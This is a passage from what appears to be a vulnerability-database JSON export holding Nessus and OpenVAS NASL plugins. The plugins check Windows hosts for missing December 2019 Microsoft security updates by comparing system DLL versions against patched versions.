script_xref(name:\"MSFT\", value:\"MS19-4530677\");\n script_xref(name:\"MSFT\", value:\"MS19-4530691\");\n script_xref(name:\"MSFT\", value:\"MS19-4530695\");\n script_xref(name:\"MSFT\", value:\"MS19-4530702\");\n script_xref(name:\"MSFT\", value:\"MS19-4530734\");\n\n script_name(english:\"Security Updates for Internet Explorer (December 2019)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing a security update. It is, therefore, affected by the\nfollowing vulnerability :\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\");\n # https://support.microsoft.com/en-us/help/4530734/windows-7-update-kb4530734\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89866a56\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4530702/windows-8-1-kb4530702\");\n # https://support.microsoft.com/en-us/help/4530677/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cac609d\");\n # https://support.microsoft.com/en-us/help/4530695/windows-server-2008-update-kb4530695\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4b9efd1a\");\n # https://support.microsoft.com/en-us/help/4530691/windows-server-2012-update-kb4530691\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c69ab12f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB4530677\n -KB4530691\n -KB4530695\n -KB4530702\n -KB4530734\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1485\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS19-12';\nkbs = make_list(\n'4530677',\n'4530691',\n'4530695',\n'4530702',\n'4530734'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19540\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4530677\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22931\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4530677\") ||\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19572\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4530677\") ||\n \n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.19572\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4530677\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21392\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4530677\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4530677 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4530702 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS19-12', kb:'4530702', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4530691 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS19-12', kb:'4530691', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4530734 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS19-12', kb:'4530734', report);\n }\n else if(os == \"6.0\")\n {\n report += ' - KB4530695 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS19-12', kb:'4530695', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2020-07-21T20:40:49", "description": "This host is missing a critical security\n update according to Microsoft KB4530702", "cvss3": {}, "published": "2019-12-11T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4530702)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815735", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815735", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815735\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1458\", \"CVE-2019-1465\", \"CVE-2019-1466\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1474\", \"CVE-2019-1484\", \"CVE-2019-1485\", \"CVE-2019-1488\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 11:44:25 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530702)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530702\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on\n the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists as,\n\n - Win32k component fails to properly handle objects in memory\n\n - win32k component improperly provides kernel information.\n\n - Windows kernel improperly handles objects in memory.\n\n - Microsoft Defender improperly handles specific buffers.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to elevate privileges, execute arbitrary code, read unauthorized\n information, bypass secuirty restrictions and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530702\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"inetcomm.dll\");\nif(!fileVer)\n exit(0);\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.19572\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Inetcomm.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 6.3.9600.19572\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:50", "description": "This host is missing a critical security\n update according to Microsoft KB4530681", "cvss3": {}, "published": "2019-12-11T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4530681)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815867", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815867", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815867\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1465\", \"CVE-2019-1466\", \"CVE-2019-1488\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1472\", \"CVE-2019-1474\", \"CVE-2019-1484\", \"CVE-2019-1458\",\n \"CVE-2019-1485\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 09:28:10 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530681)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530681\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows kernel improperly handles objects in memory.\n\n - Remote Desktop Protocol (RDP) improperly handles connection requests.\n\n - Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\n - Win32k component fails to properly handle objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to crash host server, execute code with elevated permissions, obtain information\n to further compromise the user's system, escalate privileges and bypass security\n restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530681\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"Pcadm.dll\");\nif(!sysVer)\n exit(0);\n\nif(version_in_range(version:sysVer, test_version:\"10.0.10240.0\", test_version2:\"10.0.10240.18426\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Pcadm.dll\",\n file_version:sysVer, vulnerable_range:\"10.0.10240.0 - 10.0.10240.18426\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:51", "description": "This host is missing a critical security\n update according to Microsoft KB4530714", "cvss3": {}, "published": "2019-12-11T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4530714)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1483", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1476", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815863", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815863", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815863\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1465\", \"CVE-2019-1466\", \"CVE-2019-1483\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1472\", \"CVE-2019-1474\", \"CVE-2019-1476\", \"CVE-2019-1484\",\n \"CVE-2019-1485\", \"CVE-2019-1488\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 09:28:10 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530714)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530714\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows kernel improperly handles objects in memory.\n\n - Remote Desktop Protocol (RDP) improperly handles connection requests.\n\n - Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\n - Windows AppX Deployment Server improperly handles junctions.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to crash host server, execute code with elevated permissions, obtain information\n to further compromise the user's system, escalate privileges and bypass security\n restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for 64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530714\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"Urlmon.dll\");\nif(!sysVer)\n exit(0);\n\nif(version_in_range(version:sysVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.1564\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Urlmon.dll\",\n file_version:sysVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.1564\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:54", "description": "This host is missing a critical security\n update according to Microsoft KB4530717", "cvss3": {}, "published": "2019-12-11T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4530717)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1483", "CVE-2019-1469", "CVE-2019-1471", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1476", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815865", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815865", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815865\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1465\", \"CVE-2019-1466\", \"CVE-2019-1483\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1472\", \"CVE-2019-1474\", \"CVE-2019-1476\", \"CVE-2019-1484\",\n \"CVE-2019-1485\", \"CVE-2019-1488\", \"CVE-2019-1471\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 09:28:10 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530717)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530717\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows kernel improperly handles objects in memory.\n\n - Remote Desktop Protocol (RDP) improperly handles connection requests.\n\n - Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\n - Windows AppX Deployment Server improperly handles junctions.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to crash host server, execute code with elevated permissions, obtain information\n to further compromise the user's system, escalate privileges and bypass security\n restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1803 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1803 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530717\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!sysVer)\n exit(0);\n\nif(version_in_range(version:sysVer, test_version:\"11.0.17134.0\", test_version2:\"11.0.17134.1183\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:sysVer, vulnerable_range:\"11.0.17134.0 - 11.0.17134.1183\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:56", "description": "This host is missing a critical security\n update according to Microsoft KB4530734", "cvss3": {}, "published": "2019-12-11T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4530734)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1481", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1478", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1480", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815737", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815737", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815737\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1458\", \"CVE-2019-1465\", \"CVE-2019-1466\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1474\", \"CVE-2019-1478\", \"CVE-2019-1480\", \"CVE-2019-1481\",\n \"CVE-2019-1484\", \"CVE-2019-1485\", \"CVE-2019-1488\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 14:30:14 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530734)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530734\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Win32k component fails to properly handle objects in memory.\n\n - win32k component improperly provides kernel information.\n\n - Windows kernel improperly handles objects in memory.\n\n - Windows improperly handles COM object creation.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to\n execute arbitrary code, elevate privileges, gain access to sensitive information,\n cause denial of service and bypass security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530734/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n 